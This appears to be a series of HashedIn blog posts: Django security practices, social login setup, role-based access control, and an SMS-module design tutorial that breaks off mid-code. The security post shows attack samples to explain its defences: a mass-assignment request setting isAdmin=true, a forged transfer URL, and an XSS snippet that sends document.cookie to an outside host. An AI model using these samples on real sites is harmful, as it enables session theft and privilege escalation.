Introduction

Security is vital, but its scope varies with the functionality of the web application. Some companies might care more about multi-factor authentication than others. However, one can never completely rule out attempted break-ins, so good web security is always a must.

This blog post attempts to shed some light on the possible threats and to act as an entry point for further personal research.

Mass Assignment

Mass assignment is a vulnerability in which a web application's ORM (object-relational mapping) interface is exploited to change information in the database that the user should never be allowed to change: session keys, cookie data, passwords, permissions, and admin access.


Almost all modern web application frameworks, such as Django, Java Spring, or SQLAlchemy used with frameworks such as Flask, implement an ORM interface through which the application can interact more easily with the database. Data arriving in serialization formats is automatically converted into internal objects, and the SQL statements to reflect them onto your database are generated for you. It has never been this easy!

Moving on to the downsides: if the selected framework's interface is like a three-legged chair, or if the developer fails to mark specific fields as immutable, an attacker can try to overwrite fields that you never intended to be changed from the outside. Big trouble, mate.

Here is a typical request:

POST /addUser
userid=hashedtables&password=hashedpass&email=hasher@hashedin.com
And here is the exploit (isAdmin=true):

POST /addUser
userid=hashtables&password=hashedpass&email=hash@hashedin.com&isAdmin=true

This functionality becomes exploitable when the framework binds every incoming request parameter straight onto model fields, with no whitelist of the fields the user may actually set.

The easiest way to block this kind of breach in Django is to use Forms. There will be custom cases and requirements, but forms are almost always the right thing to do. The trick is just to use them in the right way.

from django import forms
from django.contrib.auth.models import User

class UserForm(forms.ModelForm):
    class Meta(object):
        model = User
        fields = ('username', 'password', 'email')

This whitelists the fields the user can change. Similarly, there is also an exclude attribute that lets us blacklist fields instead.

We have our ModelForm. If we want to add custom requirements, we can use custom validation logic. Django lets us display an error to the user saying "your password needs to be of such and such length", or enforce any password policy we want, along with constraints on age, username, email address, and other fields.
How do we run all this validation in our code?
Call the built-in is_valid() in your view, and it will do just that, while allowing users to change only what they are authorized to change.
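As a sketch (using the UserForm above; the view name, form module, and template name are illustrative), wiring the form into a view looks like this:

# views.py - a minimal sketch of using the form in a view
from django.shortcuts import render, redirect
from myapp.forms import UserForm

def add_user(request):
    if request.method == 'POST':
        form = UserForm(request.POST)
        if form.is_valid():   # runs all field and custom validation
            form.save()       # only the whitelisted fields are ever set
            # (in real code, hash the password with set_password
            # or use Django's UserCreationForm instead)
            return redirect('/')
    else:
        form = UserForm()
    return render(request, 'add_user.html', {'form': form})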

Clickjacking

Hijacking is to vehicles as clickjacking is to clicks. Clickjacking attacks are also known as "UI redress attacks": the attacker renders a concealed layer over your website in the hope of deceiving the client into clicking on it, be it a button or a link, which redirects them to another page, owned by another application, another domain, or both.

Suppose this new endpoint's functionality is to install a script introducing a worm on your machine, which, in this case, is connected to your production server network. The worm replicates itself onto every other host it can communicate with, resulting in big trouble.

Similarly, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, users can be deceived into believing they are typing the password to their social or banking account, when they are actually typing into the attacker's form input, handing the attacker their secrets.

This can be done by using an XSS vector that swaps out endpoints and links, or even entire segments of your page, or by putting your page in an iframe and rendering the attacker's content over yours.

The common solutions, discussed below, are framekillers and the X-Frame-Options header.

Framekillers

Framekillers are a client-side defence against clickjacking. They are written in JavaScript and check whether the current window is the main window.

The suggested approach is to block rendering of the page, and unblock it only once you are sure the current window is the primary one:

<style> html{display:none;} </style>
<script>
   if(self == top) {
       document.documentElement.style.display = 'block'; 
   } else {
       top.location = self.location; 
   }
</script>

Modern browsers also support the X-Frame-Options HTTP header, which can be thought of as a setting that controls whether the page is permitted to load within a frame or iframe.
The header takes two values:

  1. DENY: the page may not be rendered inside a frame at all.
  2. SAMEORIGIN: the page may only be framed by pages from the same origin.

Django’s implementation of clickjacking protection:

  1. A simple middleware that sets the header in all responses.
  2. A set of view decorators that can be used to override the middleware or to only set the header for certain views.

The X-Frame-Options HTTP header will only be set by the middleware or view decorators if it is not already present in the response.


Setting X-Frame-Options for all responses

To set the same X-Frame-Options value for all responses in your site, add 'django.middleware.clickjacking.XFrameOptionsMiddleware' to MIDDLEWARE:


MIDDLEWARE = [
    ...
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    ...
]

The middleware above sets the X-Frame-Options header to SAMEORIGIN for every HttpResponse. If you want DENY instead, set the X_FRAME_OPTIONS setting:

X_FRAME_OPTIONS = 'DENY'

There may be views for which you do not want the X-Frame-Options header set at all. For such cases, Django offers view decorators that instruct the middleware not to set the header.


from django.http import HttpResponse
from django.views.decorators.clickjacking import xframe_options_exempt

@xframe_options_exempt
def let_load_in_an_iframe(request):
    return HttpResponse("This page is safe to load in an iframe on any site.")


Apart from @xframe_options_exempt, Django also provides the @xframe_options_deny and @xframe_options_sameorigin decorators, to set the X-Frame-Options header on a per-view basis.

Read more about it at:

ClickJacking in Django

Session fixation and hijacking

For a website's security, it is always advisable to force-redirect all HTTP communication to HTTPS. This prevents malicious network users from using software such as Wireshark or SmartSniff (tools intended for testing connectivity between networks) to sniff authentication credentials or any other data passing between the client and the server. The same sniffing can also be achieved through ARP poisoning.

More on ARP poisoning:

ARP poisoning

In some entirely plausible cases, the data can even be modified in transit between client and server, in either direction. The people responsible for this are called active network attackers.


Embrace the protection HTTPS provides and enable it on your server. There are also a few additional Django settings you will want to look through.
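A few standard Django settings worth enabling once HTTPS is on (a sketch; tune these to your deployment):

SECURE_SSL_REDIRECT = True      # redirect all plain-HTTP requests to HTTPS
SESSION_COOKIE_SECURE = True    # send the session cookie over HTTPS only
CSRF_COOKIE_SECURE = True       # same for the CSRF cookie
SESSION_COOKIE_HTTPONLY = True  # keep JavaScript away from the session cookie

Without such protections, a single XSS flaw lets an attacker exfiltrate cookies with a snippet as small as this: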


var r = new Image();
r.src = 'https://hashedin.com/record?' + document.cookie;
document.body.appendChild(r);

This could very well grab every cookie on the site, most importantly the session ID, letting the attacker impersonate a poor, well-intentioned user.

In the end, be sure to delete the session data for a user after they log out. You could also mark the session invalid upon further use, or generate something like a temporary, randomly generated security token on each login to initiate the session in a controlled manner.
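Django's built-in logout() already handles the first part: it flushes the session data when called (the view name below is illustrative):

# a minimal logout view sketch
from django.contrib.auth import logout
from django.shortcuts import redirect

def signout(request):
    logout(request)  # flushes the session data for this user
    return redirect('/')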

CSRF: Cross-Site Request Forgeries

An example of a GET request:

http://badevilcorpbank.com/transfer?from=act1&to=act2&amt=100000.00

Leaving aside the fact that this isn't even HTTPS despite everything above, there is also no validation that the request comes from a legitimate requester. I could embed this URL in an image tag and receive a hundred thousand rupees every time someone loaded the page.

Most web frameworks, like Django, have built-in CSRF protection that uses the concept of a nonce, or one-time-use number. The nonce is submitted with a form (over POST, hopefully; if not, sigh!) to the server. If the number the server generated matches the one sent through the form, the request is allowed through. If the numbers don't match, the request is rejected.
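In a Django template, the nonce is emitted with the csrf_token tag (the form action below is illustrative); AJAX clients send the same value in the X-CSRFToken header instead:

<form method="post" action="/transfer/">
  {% csrf_token %}
  <!-- form fields go here -->
  <input type="submit" value="Transfer">
</form>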

When deployed with HTTPS, Django's CsrfViewMiddleware will also check the HTTP Referer header, verifying that it is set to a URL of the same origin, including domain, subdomain, and port.

Since HTTPS offers this extra protection, it is of utmost importance to serve your site over HTTPS and keep CsrfViewMiddleware enabled site-wide.

A neat tool named Django-session-CSRF also comes in handy in such situations. Django-session-CSRF is an alternative implementation of Django’s CSRF protection that does not use cookies. Instead, it maintains the CSRF token on the server using Django’s session backend. The CSRF token must still be included in all POST requests (either with csrfmiddlewaretoken in the form or with the X-CSRFTOKEN header).

Find out more in Django-session-csrf.


Password Storage

The password is the most important credential for authenticating and recognizing a user, which is why we need robust ways to store it: hashed with a strong algorithm, never in plain text.

So what is The Right Thing to do? Use a slow, salted hashing algorithm such as bcrypt or PBKDF2. This can be achieved with tools like django-sha2, which adds stronger, yet backward-compatible, password hashing support to Django.
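In current Django versions, the same idea is expressed through the built-in PASSWORD_HASHERS setting: the first entry hashes new passwords, while the remaining entries are kept so that existing hashes can still be verified and upgraded.

PASSWORD_HASHERS = [
    'django.contrib.auth.hashers.PBKDF2PasswordHasher',
    'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
    'django.contrib.auth.hashers.SHA1PasswordHasher',  # legacy, verification only
]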

All of this highlights the need for security best practices during the development of web applications. There are immediate steps you can take to quickly and effectively improve the security of your application. However, as applications grow, they become more cumbersome to keep track of in terms of security. Putting the proper web application security best practices in place, as outlined above, will help ensure that your applications remain safe for everyone to use.

In this article, we will learn how to implement social login in a Django application by using social-auth-app-django, which happens to be one of the best alternatives to the deprecated library python-social-auth.

What is Social-Auth-App-Django?

social-auth-app-django is an open-source Python module available on PyPI. It is maintained under the Python Social Auth organization. Initially, they started off with a universal Python module called python-social-auth, which could be used in any Python-based web framework. However, that library has since been deprecated.
Going further, the code base was split into several modules in order to offer better support for Python web frameworks. The core logic of social authentication resides in the social-core module, which is then used in other modules like social-auth-app-django, social-app-flask, etc.

Installation Process

First, make sure you have created a Django project, then install social-auth-app-django from PyPI:
pip install social-auth-app-django
Next, create an app called authentication. This app will contain all the views/URLs related to Django social authentication:
python manage.py startapp authentication
Then, add 'social_django' and 'authentication' to your installed apps.

INSTALLED_APPS = [
    ...
    'social_django',
    'authentication',
]

Now, migrate the database:

python manage.py migrate

Now, go to http://localhost:8000/admin and you should see three models under the SOCIAL_DJANGO app:

Django admin with social auth

Configure Authentication Backend

Now, to use social-auth-app-django's social login, we have to define our authentication backends in the settings.py file. Note that although we want to give our users a way to sign in through Google, we also aim to retain the normal login functionality, where a username and password can be used to log in to our application. To do that, configure AUTHENTICATION_BACKENDS this way:

AUTHENTICATION_BACKENDS = (
    'social_core.backends.google.GoogleOAuth2',
    'django.contrib.auth.backends.ModelBackend',
)

Note that we still have django.contrib.auth.backends.ModelBackend in our AUTHENTICATION_BACKENDS. This lets us retain the usual login flow.

Template and Template Context Processors

To keep it simple, we will have a plain HTML file with a link that redirects the user to Google login.
Go ahead and add a templates folder to the authentication app and create a new index.html file in it. In this HTML file, we will just put a simple anchor tag that redirects to social-auth-app-django's login URL:


  
<a href="{% url 'social:begin' 'google-oauth2' %}">Google+</a>

In authentication/views.py, render this template.
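A minimal sketch of that view:

# authentication/views.py
from django.shortcuts import render

def index(request):
    return render(request, 'index.html')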


We will now have to add context processors, which provide social auth related data to template context:

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': ['templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                'social_django.context_processors.backends', # this
                'social_django.context_processors.login_redirect', # and this
            ],
        },
    },
]


URL Configurations

So, now we have our template set up, and we just need to add our index view and the Django social auth URLs to our project.
Go to urls.py and add this code:

from django.conf.urls import url, include
from django.contrib import admin
from authentication import views

urlpatterns = [
    url(r'^admin/', admin.site.urls),
    url('^api/v1/', include('social_django.urls', namespace='social')),
    url('', views.index),
]


Obtaining Google OAuth2 Credentials

To obtain the Google OAuth2 credentials, follow these steps:

  1. Go to Google developer console
  2. Create a new project, in case you do not have one already (see the drop-down at the top left of your screen).
  3. Once the project is created, you will be redirected to a dashboard. Click the ENABLE API button.
  4. Select Google+ APIs from the Social APIs section.
  5. On the next page, click the Enable button to enable the Google+ API for your project.
  6. To generate credentials, select the Credentials tab from the left navigation menu and hit the 'create credentials' button.
  7. From the drop-down, select OAuth client ID.
  8. On the next screen, select the application type (web application in this case) and enter your authorized JavaScript origins and redirect URI.

For now, just set the origin as http://localhost:8000 and the redirect URI as http://localhost:8000/complete/google-oauth2/.
Hit the create button and copy the client ID and client secret.

Configuration of OAuth Credentials

Now, go to settings.py and add your OAuth credentials like this:

SOCIAL_AUTH_GOOGLE_OAUTH2_KEY = '<your client id>'
SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = '<your client secret>'

Finally, define the LOGIN_REDIRECT_URL:

LOGIN_REDIRECT_URL = '/'

For setting up credentials for any other OAuth2 backend, the pattern is:

SOCIAL_AUTH_<BACKEND_NAME>_KEY = '<key>'
SOCIAL_AUTH_<BACKEND_NAME>_SECRET = '<secret>'

Usage

Now that the configuration is done, we can start off using the social login in the Django application. Go to http://localhost:8000 and click the Google+ anchor tag.
It should redirect to Google OAuth screen where it asks you to sign in. Once you sign in through your Gmail account, you should be redirected to the redirect URL.
To check that a user has been created, go to the Django admin (http://localhost:8000/admin) and click on the User social auths table. You should see a new user there, with google-oauth2 as the provider and your Gmail ID as the UID.

Django admin social auth user data


Triggering The OAuth URLs from Non-Django Templates

There are cases where you may want to trigger the social login URLs from a template that does not pass through Django's template context processors, for instance, when the login is implemented in an HTML template developed using ReactJS.
This is not as complicated as it looks. Just set the href on your anchor tag (the path follows from the ^api/v1/ prefix we configured in urls.py):


<a href="/api/v1/login/google-oauth2/">Google+</a>

The login URL for other OAuth providers follows the same pattern. If you are not sure what the login URL should be, there are two ways to find it: either jump into the code base, or try this hack:

  1. Create a Django template and place an anchor tag with the respective URL, as shown in the Template and Template Context Processors section.
  2. Remove the respective provider (in the case of Google OAuth2, remove social_core.backends.google.GoogleOAuth2) from the AUTHENTICATION_BACKENDS in settings.py.
  3. Click the anchor tag in the Django template. You will see Django's regular error page saying "Backend not found".
  4. Copy the current URL from the browser and use it in your non-Django template.

Summary

We learned what social-auth-app-django is and that it uses social-core behind the scenes. We also learned how to implement social login in Django, both through templates processed by Django and through non-Django templates, such as ones developed with JS frameworks like ReactJS.

Role-Based Access Control restricts users' access in a system based on their role in the organization. This makes application access refined and secure.

Django provides authentication and authorization features out of the box, and you can use them to build role-based access control. Django user authentication ships with built-in models like User, Group, and Permission, which enable the granular access control an application needs.

Here Are Some Built-In Models

User Objects: Core of Authentication

This model stores the actual users in the system. It has basic fields like username, password, and email. You can extend this class to add any further attributes your application needs. Django user authentication handles authentication through sessions and middleware.

With every request, Django attaches a request object. Through it, you can get the details of the logged-in user via request.user. To achieve role-based access control, use request.user to authorize each request to access information.
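For instance, a sketch (the view name and the 'support' group are illustrative):

# views.py - gating a view on the logged-in user's group
from django.http import HttpResponseForbidden

def support_dashboard(request):
    if not request.user.groups.filter(name='support').exists():
        return HttpResponseForbidden("Not authorized")
    # ... fetch and render support-only data ...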

Groups: Way of Categorizing Users

These are logical groups of users as required by the system. You can assign permissions and users to these groups. Django provides a basic view in the admin to create these groups and manage the permissions.
The group denotes the "role" of the user in the system. As an "admin", you may belong to a group called "admin". As support staff, you would belong to a group called "support".

Permission: Granular Access Control

The defined groups control access based on the permissions assigned to each group. By default, Django creates add, change, and delete permissions for each model.
You can use these permissions in the admin view or in your application. For example, suppose you have a model like Blog:

from django.db import models
from django.contrib.auth.models import User

class Blog(models.Model):
    pub_date = models.DateField()
    headline = models.CharField(max_length=200)
    content = models.TextField()
    author = models.ForeignKey(User)

Each such model is registered as a ContentType in Django. Every permission Django creates under the Permission class holds a reference to that specific ContentType. In this case, the following permissions are created by default:

  1. add_blog: any user or group with this permission can add a new blog.
  2. change_blog: any user or group with this permission can edit a blog.
  3. delete_blog: any user or group with this permission can delete a blog.

Adding Custom Permissions

Django's default permissions are pretty basic and may not always meet the requirements of your application. Django therefore lets you add custom permissions and use them as you need. With a model Meta attribute, you can add new permissions:

class Blog(models.Model):
    ...
    class Meta:
        permissions = (
            ("view_blog", "Can view the blog"),
            ("can_publish_blog", "Can publish a blog"),
        )

These extra permissions are created along with the default ones when you run manage.py migrate.

How To Use These Permissions

You can assign permissions to a user or a group. For instance, you can give all permissions to the "admin" group and ensure that the "support" group gets only the "change_blog" permission. This way, only an admin user can add or delete a blog. You then need role-based access checks for these permissions in your views, templates, or APIs.

Views:

To check permissions in a view, use the has_perm method or a decorator. The User object provides has_perm(perm, obj=None), where perm takes the form "<app label>.<permission codename>", and it returns True if the user has the permission.

user.has_perm('blog.can_publish_blog')

You can also use the decorator permission_required(perm, login_url=None, raise_exception=False). This decorator also takes the permission in the form "<app label>.<permission codename>". Additionally, it takes a login_url argument, which can be used to pass the URL of your login/error page. If the user does not have the required permission, they are redirected to this URL.

from django.contrib.auth.decorators import permission_required

@permission_required('blog.can_publish_blog', login_url='/signin/')
def publish_blog(request):
    ...

If you have a class-based view, you can use PermissionRequiredMixin instead. You can pass one or many permissions to the permission_required attribute.

from django.contrib.auth.mixins import PermissionRequiredMixin
from django.views import View

class PublishBlog(PermissionRequiredMixin, View):
    permission_required = 'blog.can_publish_blog'

Templates:

The permissions of the logged-in user are stored in the template variable perms (provided by the auth context processor), so you can check for a particular permission within any template of the app.
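For example, using the can_publish_blog permission defined earlier (the link target is illustrative):

{% if perms.blog.can_publish_blog %}
    <a href="/blog/publish/">Publish this blog</a>
{% endif %}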

Level of Access Control: Middleware Vs Decorator

A common question that plagues developers: "Where do I put my permission check, in a decorator or in middleware?" To answer this, you just need to know whether your access control rule is global or specific to a few views.
For instance, imagine you have two access control rules. The first states that all the users accessing the application must have “view_blog” permission. As per the second rule, only a user having a permission “can_publish_blog” can publish a blog.


For the second rule, you can add the check as a decorator on the publish_blog view.
For the former, you should put the check in your middleware, since it applies to all your URLs: a user without the permission cannot enter your application at all. The views would still be safe if you added it as a decorator instead.


But adding the decorator to every view of your application would be cumbersome, and if a new developer forgets to add it to a view, the rule gets violated.

Therefore, you should check any permission that’s valid globally in the middleware.

Summary

Thus, you can use Django user authentication to achieve complete role-based access control for your application. Go ahead and make the most of these features to make your software more secure.

Designing Modules in Python is part of HashedIn’s training program for junior developers to get better at design. Today, we are making it available as a free ebook.
 Download E-Book

Who is this ebook for?

This book is for all those who have some experience in an object-oriented programming language. If you wish to get better at module- or class-level design, then this book is definitely for you. You will be able to tell a good design from a bad one after you finish reading this book.
Throughout this book, Python is used to introduce various design patterns. However, knowledge of Python is not mandatory. If you can understand classes and methods, you will easily be able to understand the contents of this book.

How to use this book

To make the most of this book, read the requirements at the start of each chapter and write down your solution. Then read through the rest of the chapter and critique your solution.
Good design is obvious once presented. However, arriving at that solution is difficult, especially if you are new to programming. Writing down your solution is the only way to realize the shortcomings of your design. If you read the chapter without writing, you will tell yourself, "That was obvious. I would have solved it in a similar manner."

History of this book

At HashedIn, we conduct a training program for junior developers to get better at design. During one of these programs, we asked developers to design a module to send SMS/text messages. We also asked them to call the SMS module from 3 different client applications. They had 30 minutes to complete this activity.
After 30 minutes, we revealed a new set of requirements. Additionally, we set 2 hard rules for them to implement these requirements:

  1. Developers were not allowed to change the way client applications invoked their SMS module
  2. Developers were not allowed to modify existing code. Instead, they had to write new code to address the additional requirements, without duplicating code.

20 minutes later, we again introduced a new set of requirements. And after another 20 minutes, we introduced the final set of requirements.
Initially, the developers felt the problem was very simple. They were at a loss to understand why any design was even needed. Isn't this a simple Python function?
But as new requirements emerged, and because we gave them constraints (don’t change existing code) – they began to appreciate the various design principles. Some even developed a mental model to discern good design from bad.
Over time, we got the opportunity to review designs from several developers. We learned how junior developers think when asked to solve a problem. Based on these patterns, we wrote a series of blogs on how to design modules in python.

Design Modules in Python

Python Interface Design

The first module will teach you how to design a reusable Python module. By the end of the post, you will have a solid understanding of writing reusable and extensible modules in Python.

You have been given the following requirements:

You are the developer on Blipkart, an e-commerce website. You have been asked to build a reusable SMS module that other developers will use to send SMS’es. Watertel is a telecom company that provides a REST API for sending SMS’es, and your module needs to integrate with Watertel. Your module will be used by other modules such as logistics.py and orders.py.


The first goal for a module should be good Abstraction. Your module sits between client developers on one side, and the API provided by Watertel on the other side. The module’s job is to simplify sending an SMS, and to ensure that changes in Watertel do not affect your client developers.

The essence of abstractions is preserving information that is relevant in a given context, and forgetting information that is irrelevant in that context.

Watertel exposes these concepts – username, password, access_token and expiry, phone number, message, and priority. Which of these concepts are relevant to client developers?

Client developers don’t care about username and password. They don’t want to worry about expiry either. These are things our module should handle. They only care about phone number and message – “take this message, and send it to this phone number”.


Interface Design

Since developers only care about phone_number and message, our interface design is very clear – we need a send_sms(phone_number, message) function. Everything else is irrelevant.

Now, looking from an implementation perspective. We need the URL, the username, and password. We also need to manage the access token and handle its expiry. How will we get this information? Let’s carve out an interface design for our solution.

In general, if you need some information, or if you depend on other classes – you must get it via your constructor. Your class must not go about trying to find that information on its own (say from Django settings).

Here's what our interface looks like:

# sms.py:
class SmsClient:
    def __init__(self, url, username, password):
        self.url = url
        self.username = username
        self.password = password

    def send_sms(self, phone_number, message):
        # TODO - write code to send sms
        pass


Using our Class in Client Code

Next, in order to use our module, our clients need an object of SmsClient. But in order to create an object, they’d need username and password. Our first attempt would be something like this:

# In orders.py
from django.conf import settings
from sms import SmsClient
sms_client = SmsClient(settings.sms_url, settings.sms_username, settings.sms_password)
....
sms_client.send_sms(phone_number, message)

There are two problems with this:

  1. First, orders.py shouldn’t care how SmsClient objects are constructed. If we later need additional parameters in the constructor, we would have to change orders.py, and all classes that use SmsClient. Also, if we decide to read our settings from someplace else (say for test cases), then orders.py would have to be modified.
  2. The second problem is that we would have to create SmsClient objects everywhere we want to use it. This is wasteful, and also leads to code duplication.

The solution is to create the SmsClient object in the sms.py module itself [see footnote 1]. Then orders.py and logistics.py can directly import the object from sms. Here is how it looks.

# In sms.py:
from django.conf import settings

class SmsClient:
    def __init__(self, url, username, password):
        self.url = url
        self.username = username
        self.password = password

    def send_sms(self, phone_number, message):
        # TODO - write code to send sms
        pass

sms_client = SmsClient(settings.sms_url, settings.sms_username, settings.sms_password)

and in orders.py:

# orders.py
from sms import sms_client
...
# when you need to send an sms
sms_client.send_sms(phone_number, message)

Before you start implementing, think about how your clients will use your module. It’s a good idea to actually write down the client code (i.e. code in orders.py and logistics.py) before you start implementing your module.

Now that we have our interface defined, we can start implementing our module.

Python Dependency Injection

The next step is to learn how Python design patterns can benefit from dependency injection.

Here we discuss how Python module design benefits from dependency injection. You have been given the following requirements:

You are the developer on Blipkart, an e-commerce website. You have been asked to build a reusable SMS module that other developers will use to send SMS’es. Watertel is a telecom company that provides a REST API for sending SMS’es, and your module needs to integrate with Watertel. Your module will be used by other modules such as logistics.py and orders.py.


The client modules depend on our module to complete a portion of their work: sending an SMS. So our module's object has to be injected into the client modules, so that the respective modules do not know each other's internals directly.

Why Dependency Injection?

The essence of dependency injection is that it allows the client to remove all knowledge of a concrete implementation that it needs to use. This helps isolate the client from the impact of design changes and defects. It promotes reusability, testability and maintainability.

Basically, instead of having your objects creating a dependency or asking a factory object to make one for them, you pass the needed dependencies into the object externally, and you make it somebody else’s problem. This “someone” is either an object further up the dependency graph, or a dependency injector (framework) that builds the dependency graph. A dependency as I’m using it here is any other object the current object needs to hold a reference to.

The client modules, i.e. orders.py and logistics.py, can import our module's object and inject it where they need the module to perform its task.

Here is how it should look:

# In sms.py:
from django.conf import settings

class SmsClient:
    def __init__(self, url, username, password):
        self.url = url
        self.username = username
        self.password = password

    def send_sms(self, phone_number, message):
        # TODO - write code to send sms
        pass

sms_client = SmsClient(settings.sms_url, settings.sms_username, settings.sms_password)

and in orders.py:

# orders.py
from sms import sms_client
...
# when you need to send an sms
sms_client.send_sms(phone_number, message)

How does Dependency Injection help us?

1. Dependency injection decreases coupling between a class and its dependency.

2. Because dependency injection doesn't require any change in code behavior, it can be applied to legacy code as a refactoring. The result is clients that are more independent and easier to unit test in isolation, using stubs or mock objects to simulate the objects not under test. This ease of testing is often the first benefit noticed when using dependency injection.

3. It frees modules from assumptions about how other systems do what they do, letting them rely on contracts instead.

4. It prevents side effects when replacing a module.

So in all, dependency injection is a great practice to make our modules more testable, maintainable and scalable and we should use it more often to make our lives easier as developers.

Exception Handling In Python

Now we will have a detailed discussion on the Exception Handling in Python.

We will discuss in detail, the implementation of a robust SMS module.

To start sending SMS’es, we need to first login to Watertel, store the accessToken and the time when the accessToken expires.

# sms.py
class SmsClient:
    def __init__(self, url, username, password):
        self.url = url
        self.username = username
        self.password = password
        self.access_token = None
        self.expires_at = 0
    def _login(self):
        # TODO - Make HTTPS request, get accessToken and expiresAt
        # TODO - error handling, check status codes
        self.access_token = response["accessToken"]
        self.expires_at = get_current_time() + response["expiry"]

You don’t expect or want client developers to think about login, hence we make the login method private (start with the underscore).
Now we need to decide who calls the _login method. One easy (and wrong) choice is calling it from our constructor. Constructors must not do real work; they should only aid initialization. If we make network calls in the constructor, the object becomes difficult to test and difficult to reuse.
So _login cannot be called by clients, and cannot be called in the constructor. Which leaves us with only one choice – call _login from the send_sms method. And while we are at it, we will add another wrapper to directly get us the access_token without worrying about expiry. This also gives the necessary modularity to our code.

def _get_access_token(self):
    if (get_current_time() > self.expires_at):
        self._login()
    return self.access_token
def send_sms(self, phone_number, message):
    access_token = self._get_access_token()
    # TODO: use the access_token to make an API call and send the SMS

At this point we can start writing the code to send the SMS. We will assume a _make_http_request method that returns the parsed JSON object and the HTTP status code.

def send_sms(self, phone_number, message):
    access_token = self._get_access_token()
    status_code, response = self._make_http_request(access_token, phone_number, message)
    ...

Error Handling in Python – Status Codes

What should we do with the status_code? One option is to return the status_code and let our clients handle it. And that is a bad idea.
We don’t want our clients to know how we are sending the SMS. This is important – if the clients know how you send the SMS, you cannot change how your module works in the future. When we return the HTTP status code, we are telling them indirectly how our module works. This is called a leaky abstraction, and you want to avoid it as much as possible (though you can’t eliminate it completely).
So to give our code the much-needed abstraction, we will not return the status code, but we still want our clients to do some error handling. Since our clients are calling a python method, they expect to receive errors the pythonic way – using Exception Handling in Python.
When it comes to error handling, you need to be clear whose problem it is. It’s either the client developer’s fault or your module’s fault. A problem with your module’s dependency (i.e. Watertel server down) is also your module’s fault – because the client developer doesn’t know Watertel even exists.
We will create an exception class for each possible kind of error in the module.
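A minimal sketch of that hierarchy (these names are exactly the ones used in the code below; only SmsException is meant to be retryable):

# sms.py - exception types for the module
class InvalidPhoneNumberError(Exception):
    """The client passed a missing or malformed phone number."""

class InvalidMessageError(Exception):
    """The client passed a missing or too-long message."""

class BadInputError(Exception):
    """Watertel rejected our input (HTTP 400); the caller must fix the input."""

class SmsException(Exception):
    """Watertel had a problem (HTTP 5xx); retrying may help."""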

With Python exception handling in place, here is how our code looks:

def _validate_phone_number(self, phone_number):
    if not phone_number:
        raise InvalidPhoneNumberError("Empty phone number")
    phone_number = phone_number.strip()
    if (len(phone_number) > 10):
        raise InvalidPhoneNumberError("Phone number too long")
    # TODO add more such checks
def _validate_message(self, message):
    if not message:
        raise InvalidMessageError("Empty message")
    if (len(message) > 140):
        raise InvalidMessageError("Message too long")
def send_sms(self, phone_number, message):
    self._validate_phone_number(phone_number)
    self._validate_message(message)
    access_token = self._get_access_token()
    status_code, response = self._make_http_request(access_token, phone_number, message)
    if (status_code == 400):
        # This is Watertel telling us the input is incorrect
        # If it is possible, we should read the error message
        # and try to convert it to a proper error
        # We will just raise the generic BadInputError
        raise BadInputError(response.error_message)
    elif (status_code in (300, 301, 302, 401, 403)):
        # These status codes indicate something is wrong
        # with our module's logic. Retrying won't help,
        # we will keep getting the same status code
        # 3xx is a redirect, indicating a wrong url
        # 401, 403 have got to do with the access_token being wrong
        # We don't want our clients to retry, so we raise RuntimeError
        raise RuntimeError(response.error_message)
    elif (status_code >= 500):
        # This is a problem with Watertel
        # This is beyond our control, and perhaps retrying would help
        # We indicate this by raising SmsException
        raise SmsException(response.error_message)

Error Handling in Python – Exceptions

Apart from handling status codes, there's one more thing missing: handling any exceptions raised by _make_http_request. Assuming you are using the wonderful requests library, its documentation lists the exceptions it can raise (ConnectTimeout, ReadTimeout, ConnectionError, and so on).
You can categorize these exceptions into two buckets: safe to retry versus not safe to retry. If an exception is safe to retry, wrap it in an SmsException and raise that; otherwise, just let the exception propagate.
In our case, ConnectTimeout is safe to retry. ReadTimeout indicates the request made it to the server, but the server did not respond in time; in such cases you can't be sure whether the SMS was sent. If it is critical that the SMS be sent, you should retry; if your end users would be annoyed by duplicate SMSes, do not.
You can handle these exceptions inside the _make_http_request method.

# at the top of sms.py
import requests
from requests.exceptions import ConnectTimeout

def _make_http_request(self, access_token, phone_number, message):
    try:
        data = {"message": message, "phone": phone_number, "priority": self.priority}
        url = "%s?accessToken=%s" % (self.url, access_token)
        r = requests.post(url, json=data)
        return (r.status_code, r.json())
    except ConnectTimeout:
        raise SmsException("Connection timeout trying to send SMS")

This should give you the gist of how exception handling in Python helps build cleaner, more robust code.
That covers most of the implementation of our module. We won’t get into the code that actually makes the HTTP request – you can use the requests library for that.

So,

  1. Don't leak the inner workings of your module to your clients; otherwise, you can never refactor or change your implementation.
  2. Raise appropriate Errors to inform your clients about what went wrong.

Open Closed Principle in Python

The open/closed principle teaches us not to modify our already working code just for adding new features.


New Requirements – Retry Failed SMS’es

We now have a feature request from the product managers:

Customers are complaining that they don’t receive SMS’es at times. Watertel recommends resending the SMS if the status code is 5xx. Hence we need to extend the sms module to support retries with exponential backoff. The first retry should be immediate, the next retry within 2s, and the third retry within 4s. If it still continues to fail, give up and don’t try further.

Of course, our product manager assumed we would take care of a few things, viz

  1. We will implement this in all of the 50 modules that are sending SMS’es.
  2. There would be no regression bugs due to this change.


Don’t modify the code that’s already working

Let's start planning our change. There are two seemingly opposing forces here. We don't want client developers to change their code, not even a single character. At the same time, the SmsClient class we wrote in part II works great, and we don't want to change code that is already working either.
A little aside: the open/closed principle tells us that we should not modify existing source code just to add new functionality. Instead, we should find ways to extend it without modifying the source. It is the "O" in the SOLID programming principles. In our case, it implies that we don't want to touch the source code of SmsClient.

Using Inheritance

This is a tricky situation, but as with everything else in software, this problem can be solved with a little bit of indirection. We need something sitting in between our clients and our SmsClient class. That something can be a derived class of SmsClient.

# This is the class we wrote in Part III
# We are not allowed to change this class
class SmsClient:
    def send_sms(self, phone_number, message):
        ...

class SmsClientWithRetry(SmsClient):
    def __init__(self, url, username, password):
        super(SmsClientWithRetry, self).__init__(url, username, password)

    def send_sms(self, phone_number, message):
        # TODO: Insert start of retry loop here
        super(SmsClientWithRetry, self).send_sms(phone_number, message)
        # TODO: Insert end of retry loop here

# Earlier, client was an instance of SmsClient, like this
# client = SmsClient(url, username, password)
